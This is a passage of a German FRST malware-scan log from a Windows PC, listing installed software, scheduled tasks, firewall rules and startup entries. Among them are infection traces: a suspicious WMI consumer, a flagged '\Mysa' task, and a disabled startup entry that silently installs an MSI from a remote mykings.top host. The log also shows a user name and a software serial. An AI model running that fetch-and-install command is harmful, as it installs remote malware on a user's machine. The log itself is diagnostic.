Smart Organizing Monitor for SP 210 Series (HKLM-x32\...\{D1EC71F7-E534-4A54-A75A-DCDCCAD77BF7}) (Version: 1.00 - RICOH)
SmartBear AQtime 7 Standard for Embarcadero RAD Studio XE and XE2 (HKLM-x32\...\InstallShield_{DC73000A-9FD8-4445-A578-C52209A90522}) (Version: 7.30.535.861 - SmartBear Software)
SmartBear AQtime 7 Standard for Embarcadero RAD Studio XE and XE2 (x32 Version: 7.30.535.861 - SmartBear Software) Hidden
SmartWebPrinting (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sonic Foundry Sound Forge 5.0 (HKLM-x32\...\{F3D6581A-FEA1-11D4-8170-00C04F612EA4}) (Version: 5.0.0.117 - Sonic Foundry)
SPCA1528 PC Driver (HKLM-x32\...\{570C2A84-A145-4DF0-AE9D-012584DF09DC}) (Version: 2.2.2.0 - sunplus)
SQL Server 2012 Analysis Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 BI Development Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Client Tools (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Data quality client (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Data quality service (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Distributed Replay (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Documentation Components (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Full text search (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Integration Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Master Data Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Reporting Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 RS_SharePoint_SharedService (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 SQL Data Quality Common (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server-Browser für SQL Server 2012 (HKLM-x32\...\{1A4C9497-7D4B-466D-8D3A-FE0D925386DC}) (Version: 11.0.2100.60 - Microsoft Corporation)
SQL-Profiler 4.0.0 (HKLM\...\SQL-Profiler 4.0.0-2) (Version: 4.0.0-2 - EnterpriseDB)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Suite Shared Configuration CS4 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
TeeChart Standard 8 for Delphi 2009 (HKLM-x32\...\TeeChart Standard 8 for Delphi 2009) (Version: Version 8 - Steema Software SL)
Telescope Driver (HKLM-x32\...\{A59AB961-BE82-41E0-B0FB-648DFA6DDEA4}) (Version: 1.0.20 - ANC)
TMS Cloud Pack for RAD Studio XE7 v3.0.0.0 (HKLM-x32\...\TMS Cloud Pack for RAD Studio XE7_is1) (Version: 3.0.0.0 - tmssoftware.com)
TMS FMX UI Pack for RAD Studio XE7 v3.5.3.0 (HKLM-x32\...\TMS FMX UI Pack for RAD Studio XE7_is1) (Version: 3.5.3.0 - tmssoftware.com)
TMS VCL WebOSMaps for RAD Studio XE7 v2.0.2.0 (HKLM-x32\...\TMS VCL WebOSMaps for RAD Studio XE7_is1) (Version: 2.0.2.0 - tmssoftware.com)
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TortoiseGit 1.8.6.0 (64 bit) (HKLM\...\{EC93BB38-01C9-4D3B-9BA7-B26BDC03E6C1}) (Version: 1.8.6.0 - TortoiseGit)
TortoiseSVN 1.8.4.24972 (64 bit) (HKLM\...\{A2EFDE01-96B3-4E55-8834-81617ED6BCBE}) (Version: 1.8.24972 - TortoiseSVN)
TotalCADConverter (HKLM-x32\...\Total CAD Converter_is1) (Version:  - Softplicity, Inc.)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
TRichView Trial for Delphi version 16.0.1 (HKLM-x32\...\TRichViewTrialDelphi_is1) (Version: 16.0.1 - Sergei Vladimirovich Tkachenko IP)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unterstützungsdateien für Microsoft SQL Server 2008-Setup  (HKLM\...\{6AF73222-EE90-434C-AE7E-B96F70A68D89}) (Version: 10.1.2731.0 - Microsoft Corporation)
Update 4.0.2 für Microsoft .NET Framework 4 Client Profile DEU Language Pack (KB2544514) (HKLM-x32\...\{0E3DAF3D-FF69-345A-A99E-1FED304CA083}.KB2544514) (Version: 1 - Microsoft Corporation)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{53952792-BF16-300E-ADF2-E7E4367E00CF}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VyprVPN (HKLM-x32\...\{526B3DDC-6891-4F43-8F64-8B83DC9E4848}) (Version: 2.9.6.7227 - Golden Frog, GmbH.)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
wPDF V4.30 (HKLM-x32\...\wPDF_is1) (Version:  - WPCubed GmbH)
WPTools 7.28 Standard (HKLM-x32\...\WPTools7_is1) (Version: 7 - WPCubed GmbH, Germany)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{60DB653C-0B48-9A42-AF50-4688BDB82D58}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{67F2A879-82D5-4A6D-8CC5-FFB3C114B69D}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\so_activex_x64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {24C812DF-71F3-4D63-8AD1-03A9C21B61AA} - System32\Tasks\Opera scheduled Autoupdate 1374235318 => C:\Program Files (x86)\Opera\launcher.exe [2017-04-25] (Opera Software)
Task: {313BCD1C-4B57-44E1-B48A-D50AF01438EE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {34A9F733-C8B1-4D67-B2F6-6EAD78726B9E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core1d2bfa05e8820a2 => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {8008BE50-D664-4FA1-A1CB-F16026BB990C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001UA => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {93996587-9BAA-4382-BB39-57252E297464} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe 
Task: {9BF6475D-B9D7-4960-AD5A-D40AE0A9DCE6} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.11.42\SymErr.exe 
Task: {A419B2E8-1722-46E3-B623-D4F33B37B12D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_127_pepper.exe [2017-03-25] (Adobe Systems Incorporated)
Task: {ADBCFE3E-F0C5-420E-BB5A-637E2CD115FD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core => C:\Users\Hamlet\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)
Task: {C92686B0-5204-455A-B340-9F98FD8D619A} - \Mysa -> Keine Datei <==== ACHTUNG
Task: {F53029DC-F860-49D1-A903-3FD23CDED4BF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {F539D280-BB89-40F5-A7C6-DFD297E0E999} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: 

Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Media\Audiograbber\Support-Forum.lnk -> hxxp:
Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\Datenbanken\PostgreSQL 9.3\SQL Shell (psql).lnk -> C:\Program Files\DataBases\PostgreSQL\scripts\runpsql.bat (Keine Datei)
Shortcut: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Meine Websites auf MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\RAD Studio XE2\RAD Studio Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) ->  /K "C:\Program Files (x86)\Embarcadero\RAD Studio\9.0\bin\rsvars.bat"
ShortcutWithArgument: C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Coding\RAD Studio 2009\RAD Studio-Befehlszeile.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) ->  /K "C:\Program Files (x86)\CodeGear\RAD Studio\6.0\bin\rsvars.bat"

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-04-08 11:57 - 2007-08-14 03:41 - 00022016 _____ () C:\Windows\System32\cl31cl6.dll
2016-04-05 13:25 - 2016-04-05 13:25 - 00216576 _____ () C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe
2013-11-24 14:37 - 2013-11-24 14:37 - 00075504 _____ () C:\Program Files\Internet\TortoiseSVN\bin\TortoiseStub.dll
2013-11-24 14:36 - 2013-11-24 14:36 - 00088304 _____ () C:\Program Files\Internet\TortoiseSVN\bin\libsasl.dll
2017-04-30 13:19 - 2017-04-30 13:19 - 00052392 _____ () C:\Program Files (x86)\Internet\FileZilla\fzshellext_64.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Utils\Unlocker\UnlockerCOM.dll
2016-05-15 20:58 - 2009-05-07 17:51 - 00071680 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2016-05-15 20:58 - 2009-05-07 17:53 - 00379392 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2016-05-15 20:58 - 2008-01-18 15:50 - 00098816 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2016-05-15 20:58 - 2009-06-05 15:18 - 47581696 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2016-10-07 22:47 - 2016-10-07 22:47 - 00225696 _____ () C:\Program Files (x86)\VyprVPN\OpenVPN\bin\liblzo2-2.dll
2016-10-07 22:47 - 2016-10-07 22:47 - 00122264 _____ () C:\Program Files (x86)\VyprVPN\OpenVPN\bin\libpkcs11-helper-1.dll
2016-04-05 13:12 - 2016-04-05 13:12 - 00221696 _____ () C:\Program Files (x86)\GNU\GnuPG\libksba-8.dll
2016-04-05 13:06 - 2016-04-05 13:06 - 00087552 _____ () C:\Program Files (x86)\GNU\GnuPG\libgpg-error-0.dll
2016-04-05 13:01 - 2016-04-05 13:01 - 00050176 _____ () C:\Program Files (x86)\GNU\GnuPG\libw32pth-0.dll
2016-04-05 13:12 - 2016-04-05 13:12 - 00073728 _____ () C:\Program Files (x86)\GNU\GnuPG\libassuan-0.dll
2016-04-05 13:15 - 2016-04-05 13:15 - 00750592 _____ () C:\Program Files (x86)\GNU\GnuPG\libgcrypt-20.dll
2016-10-07 22:48 - 2016-10-07 22:48 - 00104960 _____ () C:\Program Files (x86)\VyprVPN\GoldenFrogWFP.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Windows\system32\msln.exe:a6aba34c1f3935df3b96c0fd4e3ef58c [562]
AlternateDataStreams: C:\ProgramData\TEMP:0B174FAE [141]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7866 mehr Seiten.

IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7866 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-05-06 23:02 - 00000035 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 10.3.29.1 - 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ImageFox.lnk => C:\Windows\pss\ImageFox.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Hamlet^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Telefon- und Branchenbuch + Rückwärtssuche Frühjahr 2015 - Schnellstarter.lnk => C:\Windows\pss\Telefon- und Branchenbuch + Rückwärtssuche Frühjahr 2015 - Schnellstarter.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeCS4ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Bonus.SSR.FR11 => "C:\Program Files (x86)\ABBYY\Bonus.ScreenshotReader.exe" /autorun
MSCONFIG\startupreg: CanonSolutionMenu => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe /logon
MSCONFIG\startupreg: CorelDRAW Graphics Suite 11b => C:\Program Files (x86)\Grafik\Corel\Register\registration.exe /title="CorelDRAW Graphics Suite 11" /date=110313 serial=DR11WBL-2155594-HXE
MSCONFIG\startupreg: Google Update => C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: Malwarebytes TrayApp => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe
MSCONFIG\startupreg: Nvtmru => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
MSCONFIG\startupreg: RAMDiskForWorkstations => "C:\Program Files\SoftPerfect RAM Disk\RAMDiskWS.exe" /hide
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Utils\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: start1 => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TuneClone => C:\Program Files\Media\TuneClone\TuneClone.exe /silence
MSCONFIG\startupreg: vmware-tray => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe
MSCONFIG\startupreg: WebResearchStartupInit => "D:\Programme\Tools\WebRech3\WRGet.exe" /StartupCheck

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{68AFFA25-3296-4DA0-8B02-3D9FB80D850B}C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe] => (Block) C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe
FirewallRules: [UDP Query User{0706E191-3A22-478F-A52A-1B7AE968BDE7}C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe] => (Block) C:\program files (x86)\codegear\rad studio\6.0\bin\webappdbg.exe
FirewallRules: [{FAD76AFA-DCA8-4476-9633-409C5BEA9789}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{349E0098-6B9E-4FEA-8B0C-149D50096675}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{FDB54937-582B-4982-8678-9DA3AB002F59}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\CorelDRW.exe
FirewallRules: [{23277EC4-4B02-4616-A941-39307182307F}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\CorelPP.exe
FirewallRules: [{CBB0D883-DC81-4291-821D-06D5613038BF}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\BarCode.exe
FirewallRules: [{78F2B95F-6411-4AA2-B683-586A334A1A12}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\Capture.exe
FirewallRules: [{0FFD897F-7644-4BA4-B98C-C23221387531}] => (Block) %ProgramFiles% (x86)\Grafik\CorelX5\Programs\PrintWiz.exe
FirewallRules: [TCP Query User{483F6C72-9B04-40FA-8CBE-06D9FE446762}C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe] => (Allow) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [UDP Query User{363C0C19-78E1-484A-A977-6EE7BEF4F128}C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe] => (Allow) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [{3CBA25F2-04AA-49A5-8427-0A45A115D82F}] => (Block) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [{D2C2E1D9-96EF-46E6-B2FE-246B4BA799E3}] => (Block) C:\program files (x86)\java\jre7\launch4j-tmp\mimo.exe
FirewallRules: [TCP Query User{08876A54-2EAF-4252-B2B0-0462005E3B87}C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [UDP Query User{F00AE74F-1BC1-4309-9355-BF6C648DACBE}C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{C657E7DA-1568-40FC-BA3D-66F72D3E9740}] => (Block) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{6D4C1424-00BC-44B9-85F5-2FB63606F6C1}] => (Block) C:\program files (x86)\embarcadero\rad studio\9.0\bin\bds.exe
FirewallRules: [{19581BBE-EF6C-4443-AAAB-5379C89DCF81}] => (Allow) C:\Program Files (x86)\Utils\AVG\avgmfapx.exe
FirewallRules: [{90227C6B-E3EB-4DCE-97EB-090D3B81E671}] => (Allow) C:\Program Files (x86)\Utils\AVG\avgmfapx.exe
